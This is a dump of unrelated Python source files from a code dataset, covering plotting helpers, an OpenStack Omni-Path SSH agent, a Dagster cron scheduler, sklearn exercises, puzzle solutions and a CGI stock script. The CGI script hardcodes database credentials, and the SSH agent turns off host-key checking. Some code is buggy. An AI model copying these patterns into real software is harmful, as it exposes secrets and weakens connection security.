lines[plot_num].get_ydata()\n y_2 = lines[plot_num + 2].get_ydata()\n ys.append(y_2)\n yerrs.append(np.abs(y_1 - y_2))\n #y_headers.append(lines[plot_num].get_label())\n master_x = []\n for x_arr in xs:\n for x in x_arr:\n if x not in master_x:\n master_x.append(x)\n master_x.sort()\n\n #==========================================================================\n # Initialise variables for printing table.\n #==========================================================================\n new_line = \"\\\\tabularnewline\\n\"\n line_break = \"\\n\"\n hline = r\"\\hline\"\n tab_start = r\"\\begin{tabular}\"\n cols = \"{|c|\"\n for ii in range(num_plots):\n cols = cols + \"c|\"\n cols = cols + \"}\"\n tab_end = r\"\\end{tabular}\"\n tab_lines = []\n raw_data = []\n\n #==========================================================================\n # Table initialisation and headers.\n #==========================================================================\n if len(y_headers) != len(ys):\n y_headers = []\n for ii in range(len(ys)):\n y_headers.append(r\"$\\Gamma_%d$\" % ii)\n\n tab_lines.append(tab_start + cols)\n tab_lines.append(line_break)\n tab_lines.append(hline + line_break)\n tab_lines.append(\" %s \" % x_header)\n for y_header in y_headers:\n tab_lines.append(\"& %s \" % y_header)\n tab_lines.append(new_line)\n tab_lines.append(hline + line_break)\n\n #==========================================================================\n # Table body.\n #==========================================================================\n for x in master_x:\n tab_lines.append(\" %d \" % x)\n raw_data.append(\"%4d \" % int(x))\n for x_arr, y_arr, y_err in zip(xs, ys, yerrs):\n if x in x_arr:\n ind = np.where(x_arr == x)[0][0]\n y_str, e_str = fitting.format_value_error_string(y_arr[ind],\n y_err[ind])\n tab_lines.append(\"& %s(%s) \" % (y_str, e_str))\n raw_data.append(\"%10g %10g \" % (y_arr[ind], y_err[ind]))\n else:\n tab_lines.append(\"& - \")\n tab_lines.append(new_line)\n raw_data.append(\"\\n\")\n\n #==========================================================================\n # Table end.\n #==========================================================================\n tab_lines.append(hline + line_break)\n tab_lines.append(tab_end)\n tab_lines.append(line_break)\n tab_lines.append(line_break)\n\n return tab_lines, raw_data\n\n\ndef get_optimal_legend_loc(ax):\n \"\"\"\n Name: get_optimal_legend_loc\n Purpose: Given a single axis, or a list of axes sharing the same limits,\n work out which quadrant of the axis is the emptiest, and return\n this as the optimal location for a legend.\n \"\"\"\n #==========================================================================\n # Initialise variables.\n #==========================================================================\n quadrants = {\"upper right\": 0, \"upper left\": 0,\n \"lower right\": 0, \"lower left\": 0}\n\n if type(ax) == list:\n lines = []\n for axis in ax:\n for line in axis.lines:\n lines.append(line)\n ylim = axis.get_ylim()\n xlim = axis.get_xlim()\n else:\n lines = ax.lines\n ylim = ax.get_ylim()\n xlim = ax.get_xlim()\n\n #==========================================================================\n # For each point in the plot, determine if it is in the upper/lower, then\n # left/right quadrant. Increment the respective counter.\n #==========================================================================\n y_len = (ylim[1] - ylim[0]) / 2\n\n for line in lines:\n x_data = line.get_xdata()\n y_data = line.get_ydata()\n for x, y in zip(x_data, y_data):\n up_diff = abs(ylim[1] - y)\n down_diff = abs(ylim[0] - y)\n if up_diff >= down_diff:\n loc_v = \"lower\"\n v_severity = np.exp(5 * (1 - (down_diff / y_len)))\n else:\n loc_v = \"upper\"\n v_severity = np.exp(5 * (1 - (up_diff / y_len)))\n\n left_diff = abs(xlim[0] - x)\n right_diff = abs(xlim[1] - x)\n loc_h = \"right\" if left_diff >= right_diff else \"left\"\n\n quadrants[\"%s %s\" % (loc_v, loc_h)] += v_severity\n\n #==========================================================================\n # Return the quadrant which has the least points within that might be\n # covered by the legend.\n #==========================================================================\n for quadrant, severity in quadrants.iteritems():\n if severity == min(quadrants.values()):\n return quadrant\n\n\ndef suggest_legend_loc(axis):\n \"\"\"\n Name: suggest_legend_loc\n Purpose: Read data from plot and decide whether to put legend in upper\n right or lower right corner depending upon where there appears\n to be the most space. Assumes that we are plotting monotically\n decreasing/increasing function for optimal results.\n \"\"\"\n #==========================================================================\n # Initialise variables - get data from plot.\n #==========================================================================\n lines = axis.lines\n ylim = axis.get_ylim()\n xlim = axis.get_xlim()\n\n #==========================================================================\n # Determine top/bottom: is the maximum y value closest to the upper\n # boundary (loc=lower), or is the minimum y value closest to the lower\n # boundary (loc=upper)?\n #==========================================================================\n y_max = None\n y_min = None\n for line in lines:\n line_max = max(line.get_ydata())\n line_min = min(line.get_ydata())\n if y_max is None or y_max < line_max:\n y_max = line_max\n if y_min is None or y_min > line_min:\n y_min = line_min\n\n up_diff = abs(ylim[1] - y_max)\n low_diff = abs(ylim[0] - y_min)\n if up_diff >= low_diff:\n loc_v = \"upper\"\n y_comp = y_max\n else:\n loc_v = \"lower\"\n y_comp = y_min\n\n #==========================================================================\n # Determine left/right: is the y value closest to the top/bottom boundary\n # in the left half (loc=right) or right half (loc=left) of the plot?\n #==========================================================================\n for line in lines:\n y_data = line.get_ydata()\n if y_comp in y_data:\n x_data = line.get_xdata()\n x = x_data[np.where(np.array(y_data) == y_comp)]\n left_diff = abs(xlim[0] - x)\n right_diff = abs(xlim[1] - x)\n if left_diff >= right_diff:\n loc_h = \"left\"\n else:\n loc_h = \"right\"\n\n loc = \"%s %s\" % (loc_v, loc_h)\n return loc\n\n\n","sub_path":"Analysis/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":19443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"203615930","text":"import paramiko\n\nfrom oslo_log import log as logging\n\nfrom neutron.plugins.ml2.drivers.omnipath import config\nfrom neutron.plugins.ml2.drivers.omnipath import omnipath_exceptions\n\nLOG = logging.getLogger(__name__)\nOPA_BINARY = \"opafmvf\"\n\n\nclass FabricAgentCLI(object):\n def __init__(self):\n self._agent_hostname = None\n self._agent_username = None\n self._agent_key_path = None\n\n self._read_config()\n\n self.client = paramiko.SSHClient()\n self.connect()\n\n def _read_config(self):\n self._agent_hostname = config.CONF.omnipath_config.IP_ADDRESS\n LOG.debug(\"Fabric Agent IP address: %s\", self._agent_hostname)\n self._agent_username = config.CONF.omnipath_config.USERNAME\n self._agent_key_path = config.CONF.omnipath_config.KEY\n\n def connect(self):\n try:\n key = paramiko.RSAKey.from_private_key_file(self._agent_key_path)\n self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.client.connect(\n self._agent_hostname, port=22, username=self._agent_username, pkey=key)\n except omnipath_exceptions.FabricAgentSSHError:\n LOG.error(\"Error connecting to Omnipath FM\")\n\n def execute_command(self, command):\n # out = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n # stdout, stderr = out.communicate()\n stdin, stdout, stderr = self.client.exec_command(command)\n if stderr:\n raise omnipath_exceptions.FabricAgentCLIError\n return stdout.read()\n\n def osfa_config_commands(self, command, vf_name, *args):\n try:\n if command == \"create\":\n cmd = [OPA_BINARY, \"create\", vf_name]\n elif command == \"delete\":\n cmd = [OPA_BINARY, \"delete\", vf_name]\n elif command == \"add\":\n cmd = [OPA_BINARY, \"add\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n elif command == \"remove\":\n cmd = [OPA_BINARY, \"remove\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n else:\n raise omnipath_exceptions.FabricAgentUnknownCommandError\n return self.execute_command(cmd)\n except omnipath_exceptions.FabricAgentUnknownCommandError:\n LOG.error(command + \" not supported in opafmvf CLI\")\n\n def osfa_query_commands(self, command, vf_name, *args):\n try:\n if command == \"exist\":\n cmd = [OPA_BINARY, \"exist\", vf_name]\n elif command == \"ismember\":\n cmd = [OPA_BINARY, \"ismember\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n elif command == \"isnotmember\":\n cmd = [OPA_BINARY, \"isnotmember\", vf_name, \"\".join(str(x + \" \") for x in args).rstrip()]\n else:\n raise omnipath_exceptions.FabricAgentUnknownCommandError\n return self.execute_command(cmd)\n except omnipath_exceptions.FabricAgentUnknownCommandError:\n LOG.error(command + \" not supported in opafmvf CLI\")\n\n def osfa_management_commands(self, command):\n try:\n if command == \"reset\":\n cmd = [OPA_BINARY, \"reset\"]\n elif command == \"commit\":\n cmd = [OPA_BINARY, \"commit\"]\n elif command == \"reload\":\n cmd = [OPA_BINARY, \"reload\"]\n elif command == \"restart\":\n cmd = [OPA_BINARY, \"restart\"]\n else:\n raise omnipath_exceptions.FabricAgentUnknownCommandError\n return self.execute_command(cmd)\n except omnipath_exceptions.FabricAgentUnknownCommandError:\n LOG.error(command + \" not supported in opafmvf CLI\")\n\n\nclass FabricAgentClient(object):\n def __init__(self):\n self.cli = FabricAgentCLI()\n\n # Neutron FabricAgentClient sending requests to Fabric Agent:\n def full_sync(self, guids_info):\n \"\"\"Will send list of GUIDs to be created/deleted to OpenStack Fabric Agent. The creates/deletes are implicit.\n\n :param guid_info: {vf_name1: [guid1, guid2], vf_name2: [guid3, guid4]}\n :return: bind status\n \"\"\"\n\n # lock\n # Add global lock so that this command is sent by only one neutron server\n for vf_name, guids in guids_info:\n config_status = self.cli.osfa_config_commands(\"add\", vf_name, guids)\n if config_status == 2:\n return \"ERROR\" # Port Status ERROR\n\n commit_status = self.cli.osfa_management_commands(\"commit\")\n if commit_status != 0:\n return \"ERROR\" # Port Status ERROR\n\n reload_status = self.cli.osfa_management_commands(\"reload\")\n if reload_status != 0:\n return \"ERROR\" # Port Status ERROR\n\n return \"DOWN\" # Port Status DOWN\n # unlock\n\n # Neutron retrieving status from Fabric Agent:\n\n def get_port_status(self, vf_name, guid):\n \"\"\"\n\n :param vf_name: Name of the VF\n :param guid: ID of the physical server\n :return: bind status\n \"\"\"\n\n query_status = self.cli.osfa_query_commands(\"ismember\", vf_name, [guid])\n if query_status == 0:\n return \"UP\"\n else:\n return \"DOWN\"\n","sub_path":"neutron/plugins/ml2/drivers/omnipath/mechanism_driver/fabric_agent.py","file_name":"fabric_agent.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400026438","text":"# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isSymmetrical(self, pRoot):\n if not pRoot:\n return True\n queue = [pRoot]\n right = pRoot\n while queue:\n p = queue.pop(0)\n if p.val != '#': # 如果当前不是空节点,则给空子树插入空节点\n if not p.left:\n p.left = TreeNode('#')\n if not p.right:\n p.right = TreeNode('#')\n queue.append(p.left)\n queue.append(p.right)\n if right == p:\n if not self.is_list_symmetrical(queue):\n return False\n if not queue:\n break\n right = queue[-1]\n return True\n\n def is_list_symmetrical(self, queue):\n if len(queue) % 2: # 长度为奇数\n return False\n left, right = len(queue) // 2 - 1, len(queue) // 2\n while left >= 0:\n if (not queue[left]) or (not queue[right]): # None\n if queue[left] == queue[right]:\n left -= 1\n right += 1\n continue\n else:\n return False\n if queue[left].val != queue[right].val:\n return False\n left -= 1\n right += 1\n return True\n\n","sub_path":"对称的二叉树/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591563935","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis, \\\n\tQuadraticDiscriminantAnalysis\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\n\ndata = pd.read_csv('datasets\\\\Auto.csv')\ndata = data.assign(weight_x_accel=data['weight'] * data['acceleration'])\n\ndata['mpg01'] = data['mpg'].apply(lambda x: 1 if x > np.median(data['mpg']) else 0)\n\nfig, ax = plt.subplots(1, 3)\nax[0].scatter(data['weight'], data['mpg01'])\nax[1].scatter(data['displacement'], data['mpg01'])\nax[2].scatter(data['acceleration'], data['mpg01'])\n\nax[0].set_title('weight')\nax[1].set_title('displacement')\nax[2].set_title('acceleration')\n\nX_train, X_test, y_train, y_test = train_test_split(\n\tdata[['acceleration', 'weight', 'displacement', 'weight_x_accel']],\n\tdata['mpg01'], test_size=0.25)\n\naccuScore = pd.DataFrame(index=['logreg', 'lda', 'qda'], columns=['accuracyScore'])\n\n# All methods perform well (accuracy score>0.9)\nlda = LinearDiscriminantAnalysis().fit(X_train, y_train)\nconfusion_matrix(y_test, lda.predict(X_test))\naccuScore.loc['lda'] = accuracy_score(y_test, lda.predict(X_test))\n\nlogreg = LogisticRegression().fit(X_train, y_train)\nconfusion_matrix(y_test, logreg.predict(X_test))\naccuScore.loc['logreg'] = accuracy_score(y_test, logreg.predict(X_test))\n\nqda = LinearDiscriminantAnalysis().fit(X_train, y_train)\nconfusion_matrix(y_test, qda.predict(X_test))\naccuScore.loc['qda'] = accuracy_score(y_test, qda.predict(X_test))\n\naccuScore.plot(kind='bar')\n\n# Now let us see which k does best in knn model\nfrom sklearn.neighbors import KNeighborsClassifier\n\naccuScore_k = pd.Series(index=np.arange(1, 100), name='accuracy_score',\n\t\t\t\t\t\tdtype='float')\nfor ii in accuScore_k.index:\n\taccuScore_k[ii] = accuracy_score(y_test,\n\t\t\t\t\t\t\t\t\t KNeighborsClassifier(n_neighbors=ii).fit(\n\t\t\t\t\t\t\t\t\t\t X_train, y_train).predict(X_test))\n\n# The curve flattens out when the number of neighbors approaches the the number of\n# test points.\nax = accuScore_k.plot()\nax.set_xlabel('n_neighbors')\nax.set_ylabel('accuracy_score')\n","sub_path":"Ch4_Ex11.py","file_name":"Ch4_Ex11.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635056589","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n\n'''\nimport sys\nimport codecs\n#import cgitb\n#cgitb.enable()\n\nsys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout.detach())\n\n# Import modules for CGI handling \nimport logging\nimport cgi, cgitb \nimport json\nimport requests\nimport json \nimport numpy\nimport pandas as pd\n#import time\nimport utility\nimport traceback\nimport pymysql\n# Create instance of FieldStorage \nform = cgi.FieldStorage() \n\n# Get data from fields\nids = form.getvalue('ids')\n'''\nif ids is None:\n print (\"Content-type:text/json\\n\")\n print (\"Access-Control-Allow-Origin:*\")\n print (\"ids is null. 沒有欲查詢的股票代碼\")\n'''\n#req_ids= ids.split(\",\")\nres_ids = list() # mis.twse.com.tw 有回覆的股票價格資訊\n#print \"Content-type:text/html\\n\"\n#print \"代碼!股票名稱a!22!33!44!55!66!77!88!99!000!111!222!333\"\n\n#targets = ['1101','1102','1103']\ntargets = ids.split(',')\n#stock_list = '|'.join('tse_{}.tw'.format(target) for target in targets) 上市\n#stock_list = '|'.join('otc_{}.tw'.format(target) for target in targets) 上櫃\nstock_list = '|'.join('{}.tw'.format(target) for target in targets)\n#print \"

    Hello %s %s

    \"% (stock_list, stock_list)\n'''\n\n'''\n# ts = datetime.datetime.now().timestamp()\n#current_milli_time = lambda: int(round(time.time() * 1000))\ntry:\n # 資料庫參數設定\n db_settings = {\n \"host\": \"192.168.1.13\",\n \"port\": 3306,\n \"user\": \"j20521007\",\n \"password\": \"j10551055\",\n \"db\": \"stock_sys\",\n \"charset\": \"utf8\"\n }\n # 建立Connection物件\n conn = pymysql.connect(**db_settings)\n # 建立Cursor物件\n with conn.cursor() as cursor:\n # 查詢資料SQL語法\n command = \"SELECT * FROM stock_group\"\n # 執行指令\n cursor.execute(command)\n # 取得所有資料\n result = cursor.fetchall()\n '''\n print(\"
    \")\n print(targets)\n print(\"
    \")\n print(res_ids)\n print(\"
    \")\n print(diff_ids)\n print(\"
    \")\n '''\n\n '''\n # json Test\n jsonData = {\"success\": \"true\"}\n '''\n #jsonData = json.dumps(resultData)\n resultData = []\n resultData.append({\"code\":\"999\", \"name\":\"--\", \"price\":0, \"pfp\":0})\n # result = {\"Success\":True,\"Msg\":\"\", \"timestamp\":utility.timestamp_milli(), \"Data\":resultData}\n jsonData = json.dumps(result)\n print (\"Content-type:application/json;charset=UTF-8\")\n print (\"Access-Control-Allow-Origin: *\")\n print (\"\") # 要 Access-Control-Allow-Origin: * 一定要這樣的輸出各式\n print (jsonData)\nexcept Exception as e:\n resultData = []\n resultData.append({\"code\":\"999\", \"name\":\"--\", \"price\":0, \"pfp\":0})\n error_class = e.__class__.__name__ #取得錯誤類型\n detail = e.args[0] #取得詳細內容\n cl, exc, tb = sys.exc_info() #取得Call Stack\n lastCallStack = traceback.extract_tb(tb)[-1] #取得Call Stack的最後一筆資料\n fileName = lastCallStack[0] #取得發生的檔案名稱\n lineNum = lastCallStack[1] #取得發生的行號\n funcName = lastCallStack[2] #取得發生的函數名稱\n errMsg = \"File \\\"{}\\\", line {}, in {}: [{}] {}\".format(fileName, lineNum, funcName, error_class, detail)\n # print(errMsg)\n\n result = {\"Success\":False,\"Msg\":\"An Error occurred:{}\".format(errMsg), \"timestamp\":utility.timestamp_milli()}\n jsonData = json.dumps(result)\n print (\"Content-type:application/json;charset=UTF-8\")\n print (\"Access-Control-Allow-Origin: *\")\n print (\"\") # 要 Access-Control-Allow-Origin: * 一定要這樣的輸出格式、順序\n print (jsonData)","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"399104984","text":"\"\"\"\nSerializes and deserializes images \nafter converted to the DataFrame format\n\"\"\"\nimport cv2\nimport numpy as np\nimport json\n\n# Deserializes image from data frame dump\ndef deserialize_image(df_dump, width=72, height=48, depth=3, config='/home/ubuntu/settings.json'):\n # [1:-1] is used to remove '[' and ']' from dataframe string\n df_dump = np.fromstring(df_dump[1:-1], sep=', ', dtype='uint8')\n print(df_dump.shape)\n with open(config) as d:\n SETTINGS = json.load(d)\n width=SETTINGS['width']\n height=SETTINGS['height']\n depth=SETTINGS['depth']\n df_dump = np.resize(df_dump, (height, width, depth))\n\n return df_dump\n\n# Serializes image to data frame dump\ndef serialize_image(frame):\n return frame.tolist()\n","sub_path":"suiron/img_serializer.py","file_name":"img_serializer.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"616940606","text":"import io\nimport os\nimport shutil\nimport stat\n\nimport six\nfrom crontab import CronTab\n\nfrom dagster import DagsterInstance, check, seven, utils\nfrom dagster.core.definitions import RepositoryDefinition\nfrom dagster.core.scheduler import DagsterSchedulerError, Scheduler\nfrom dagster.serdes import ConfigurableClass\n\n\nclass SystemCronScheduler(Scheduler, ConfigurableClass):\n '''Scheduler implementation that uses the local systems cron. Only works on unix systems that\n have cron.\n\n Enable this scheduler by adding it to your ``dagster.yaml`` in ``$DAGSTER_HOME``.\n '''\n\n def __init__( # pylint: disable=super-init-not-called\n self, inst_data=None,\n ):\n self._inst_data = inst_data\n self._cron_tab = CronTab(user=True)\n\n @property\n def inst_data(self):\n return self._inst_data\n\n @classmethod\n def config_type(cls):\n return {}\n\n @staticmethod\n def from_config_value(inst_data, config_value):\n return SystemCronScheduler(inst_data=inst_data)\n\n def debug_info(self):\n return \"Running Cron Jobs:\\n{jobs}\\n\".format(\n jobs=\"\\n\".join(\n [str(job) for job in self._cron_tab if 'dagster-schedule:' in job.comment]\n )\n )\n\n def start_schedule(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n schedule = self._get_schedule_by_name(instance, repository, schedule_name)\n\n # If the cron job already exists, remove it. This prevents duplicate entries.\n # Then, add a new cron job to the cron tab.\n if self.running_schedule_count(repository.name, schedule.name) > 0:\n self._end_cron_job(instance, repository, schedule)\n\n self._start_cron_job(instance, repository, schedule)\n\n # Verify that the cron job is running\n running_schedule_count = self.running_schedule_count(repository.name, schedule.name)\n if running_schedule_count == 0:\n raise DagsterSchedulerError(\n \"Attempted to write cron job for schedule \"\n \"{schedule_name}, but failed. \"\n \"The scheduler is not running {schedule_name}.\".format(schedule_name=schedule.name)\n )\n elif running_schedule_count > 1:\n raise DagsterSchedulerError(\n \"Attempted to write cron job for schedule \"\n \"{schedule_name}, but duplicate cron jobs were found. \"\n \"There are {running_schedule_count} jobs running for the schedule.\"\n \"To resolve, run `dagster schedule up`, or edit the cron tab to \"\n \"remove duplicate schedules\".format(\n schedule_name=schedule.name, running_schedule_count=running_schedule_count\n )\n )\n\n def stop_schedule(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n schedule = self._get_schedule_by_name(instance, repository, schedule_name)\n\n self._end_cron_job(instance, repository, schedule)\n\n # Verify that the cron job has been removed\n running_schedule_count = self.running_schedule_count(repository.name, schedule.name)\n if running_schedule_count > 0:\n raise DagsterSchedulerError(\n \"Attempted to remove existing cron job for schedule \"\n \"{schedule_name}, but failed. \"\n \"There are still {running_schedule_count} jobs running for the schedule.\".format(\n schedule_name=schedule.name, running_schedule_count=running_schedule_count\n )\n )\n\n def wipe(self, instance):\n # Note: This method deletes schedules from ALL repositories\n check.inst_param(instance, 'instance', DagsterInstance)\n\n # Delete all script files\n script_directory = os.path.join(instance.schedules_directory(), \"scripts\")\n if os.path.isdir(script_directory):\n shutil.rmtree(script_directory)\n\n # Delete all logs\n logs_directory = os.path.join(instance.schedules_directory(), \"logs\")\n if os.path.isdir(logs_directory):\n shutil.rmtree(logs_directory)\n\n # Remove all cron jobs\n for job in self._cron_tab:\n if 'dagster-schedule:' in job.comment:\n self._cron_tab.remove_all(comment=job.comment)\n\n self._cron_tab.write()\n\n def _get_bash_script_file_path(self, instance, repository, schedule):\n check.inst_param(instance, 'instance', DagsterInstance)\n\n script_directory = os.path.join(instance.schedules_directory(), \"scripts\")\n utils.mkdir_p(script_directory)\n\n script_file_name = \"{}.{}.sh\".format(repository.name, schedule.name)\n return os.path.join(script_directory, script_file_name)\n\n def _cron_tag_for_schedule(self, repository_name, schedule_name):\n return 'dagster-schedule: {repository_name}.{schedule_name}'.format(\n repository_name=repository_name, schedule_name=schedule_name\n )\n\n def _start_cron_job(self, instance, repository, schedule):\n script_file = self._write_bash_script_to_file(instance, repository, schedule)\n\n schedule_logs_directory = self.get_logs_directory(instance, repository, schedule.name)\n if not os.path.isdir(schedule_logs_directory):\n utils.mkdir_p(schedule_logs_directory)\n schedule_log_file_path = self.get_logs_path(instance, repository, schedule.name)\n\n command = \"{script_file} > {schedule_log_file_path} 2>&1\".format(\n script_file=script_file, schedule_log_file_path=schedule_log_file_path\n )\n\n job = self._cron_tab.new(\n command=command,\n comment='dagster-schedule: {repository_name}.{schedule_name}'.format(\n repository_name=repository.name, schedule_name=schedule.name\n ),\n )\n job.setall(schedule.cron_schedule)\n self._cron_tab.write()\n\n def _end_cron_job(self, instance, repository, schedule):\n self._cron_tab.remove_all(\n comment=self._cron_tag_for_schedule(repository.name, schedule.name)\n )\n self._cron_tab.write()\n\n script_file = self._get_bash_script_file_path(instance, repository, schedule)\n if os.path.isfile(script_file):\n os.remove(script_file)\n\n def running_schedule_count(self, repository_name, schedule_name):\n cron_tab = CronTab(user=True)\n matching_jobs = cron_tab.find_comment(\n self._cron_tag_for_schedule(repository_name, schedule_name)\n )\n\n return len(list(matching_jobs))\n\n def get_logs_directory(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n logs_directory = os.path.join(instance.schedules_directory(), \"logs\")\n schedule_logs_directory = os.path.join(logs_directory, repository.name, schedule_name)\n return schedule_logs_directory\n\n def get_logs_path(self, instance, repository, schedule_name):\n check.inst_param(instance, 'instance', DagsterInstance)\n check.inst_param(repository, 'repository', RepositoryDefinition)\n check.str_param(schedule_name, 'schedule_name')\n\n logs_directory = self.get_logs_directory(instance, repository, schedule_name)\n return os.path.join(logs_directory, \"scheduler.log\")\n\n def _write_bash_script_to_file(self, instance, repository, schedule):\n # Get path to store bash script\n script_file = self._get_bash_script_file_path(instance, repository, schedule)\n\n # Get path to store schedule attempt logs\n schedule_logs_directory = self.get_logs_directory(instance, repository, schedule.name)\n if not os.path.isdir(schedule_logs_directory):\n utils.mkdir_p(schedule_logs_directory)\n\n schedule_log_file_name = \"{}_{}.result\".format(\"${RUN_DATE}\", schedule.name)\n schedule_log_file_path = os.path.join(schedule_logs_directory, schedule_log_file_name)\n\n # Environment information needed for execution\n dagster_graphql_path = os.path.join(\n os.path.dirname(schedule.python_path), 'dagster-graphql'\n )\n dagster_home = os.getenv('DAGSTER_HOME')\n\n script_contents = '''\n #!/bin/bash\n export DAGSTER_HOME={dagster_home}\n export LANG=en_US.UTF-8\n {env_vars}\n\n export RUN_DATE=$(date \"+%Y%m%dT%H%M%S\")\n\n {dagster_graphql_path} -p startScheduledExecution -v '{variables}' -y \"{repo_path}\" --output \"{result_file}\"\n '''.format(\n dagster_graphql_path=dagster_graphql_path,\n repo_path=schedule.repository_path,\n variables=seven.json.dumps({\"scheduleName\": schedule.name}),\n result_file=schedule_log_file_path,\n dagster_home=dagster_home,\n env_vars=\"\\n\".join(\n [\n \"export {key}={value}\".format(key=key, value=value)\n for key, value in schedule.environment_vars.items()\n ]\n ),\n )\n\n with io.open(script_file, 'w', encoding='utf-8') as f:\n f.write(six.text_type(script_contents))\n\n st = os.stat(script_file)\n os.chmod(script_file, st.st_mode | stat.S_IEXEC)\n\n return script_file\n","sub_path":"python_modules/libraries/dagster-cron/dagster_cron/cron_scheduler.py","file_name":"cron_scheduler.py","file_ext":"py","file_size_in_byte":9743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"459829687","text":"'''\nCheck whether a 9 x 9 2d array representing a partially completed Sudoku is valid. Specifically,\ncheck that no row, column or 3 x 3 2D subarray contains duplicates. A 0-value in the 2D array\nindicates that entry is blank; every other entry is in [1, 9]\n'''\n\n'''\nTime-complexity: O(n^2), Space-complexity: O(n)\n'''\n\nimport math\nimport collections\n\n\n# Check if partially filled matrix has any conflicts\ndef is_valid_sudoku(partial_assignment):\n # Return True if subarray\n # partial_assignment[start_row:end_row][start_col:end_col] contains any\n # duplicates in {1, 2, ..., len(partial_assignment)}; otherwise return\n # False\n def has_duplicate(block):\n print('calling has_duplicate with block: ', block)\n block = list(filter(lambda x: x != 0, block))\n print('block after filter: ', block)\n print('set(block): ', set(block))\n return len(block) != len(set(block))\n\n n = len(partial_assignment)\n # Check row and column constraints.\n if any(\n has_duplicate([partial_assignment[i][j] for j in range(n)])\n or has_duplicate([partial_assignment[j][i] for j in range(n)])\n for i in range(n)):\n return False\n \n # # Check region constaints\n region_size = int(math.sqrt(n))\n return all(not has_duplicate([\n partial_assignment[a][b]\n for a in range(region_size * I, region_size * (I + 1))\n for b in range(region_size * J, region_size * (J + 1))\n ]) for I in range(region_size) for J in range(region_size))\n\n\n'''\nA cooler solution\n'''\n\n# Pythonic solution that exploits the power of list comprehension.\ndef is_valid_sudoku_pythonic(partial_assignment):\n region_size = int(math.sqrt(len(partial_assignment)))\n return max(\n collections.Counter(k for i, row in enumerate(partial_assignment)\n for j, c in enumerate(row) if c != 0\n for k in ((i, str(c)), (str(c), j),\n (i / region_size, j / region_size,\n str(c)))).values(),\n default=0) <= 1\n\n\nsudoku = [\n [5, 3, 0, 0, 0, 0, 0, 0 ,0],\n [6, 0, 0, 1, 9, 5, 0, 0, 0],\n [0, 9, 8, 0, 0, 0, 0, 6, 0],\n [8, 0, 0, 0, 6, 0, 0, 0, 3],\n [4, 0, 0, 8, 0, 3, 0, 0, 1],\n [7, 0, 0, 0, 2, 0, 0, 0, 6],\n [0, 6, 0, 0, 0, 0, 2, 8, 0],\n [0, 0, 0, 4, 1, 9, 0, 0, 5],\n [0, 0, 0, 0, 8, 0, 0, 7, 9]\n]\n\n# print(is_valid_sudoku(sudoku))\nprint(is_valid_sudoku_pythonic(sudoku))","sub_path":"Python/EPI/Arrays/is_valid_sudoku.py","file_name":"is_valid_sudoku.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"338042761","text":"t1, t2 = [ int(v) for v in input().split() ]\na1, a2 = [ int(v) for v in input().split() ]\nb1, b2 = [ int(v) for v in input().split() ]\n\nif a1*t1 + a2*t2 == b1*t1 + b2*t2:\n ans = -1\nelse:\n if a1*t1 + a2*t2 < b1*t1 + b2*t2:\n a1, b1 = b1, a1\n a2, b2 = b2, a2\n\n mind = a1*t1 - b1*t1\n if mind > 0:\n ans = 0\n else:\n lastd = a1*t1 + a2*t2 - b1*t1 - b2*t2\n mind = abs(mind)\n if mind % lastd == 0:\n ans = 2 * (mind // lastd) \n else:\n ans = 2 * (mind // lastd) + 1\n \nprint(ans if ans != -1 else \"infinity\")","sub_path":"Python_codes/p02846/s465327655.py","file_name":"s465327655.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564275960","text":"from django.conf.urls import include, url\nfrom rest_framework.routers import DefaultRouter\n\nfrom . import api, views\n\nrouter = DefaultRouter()\nrouter.register(r\"assessment\", api.EpiMetaAssessmentViewset, basename=\"assessment\")\nrouter.register(r\"protocol\", api.MetaProtocol, basename=\"protocol\")\nrouter.register(r\"result\", api.MetaResult, basename=\"result\")\n\n\napp_name = \"meta\"\nurlpatterns = [\n # API\n url(r\"^api/\", include((router.urls, \"api\"))),\n # protocol views\n url(\n 